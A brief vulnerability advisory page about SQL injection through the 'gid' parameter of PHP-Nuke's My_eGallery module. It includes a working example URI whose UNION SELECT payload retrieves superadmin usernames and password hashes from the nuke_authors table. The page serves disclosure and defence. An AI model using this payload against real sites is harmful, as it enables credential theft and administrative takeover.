PHP-Nuke My_eGallery Module 'gid' Parameter SQL Injection Vulnerability

info
discussion
exploit
solution
references

PHP-Nuke My_eGallery Module 'gid' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/modules.php?name=My_eGallery&file=index&do=showgall&gid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*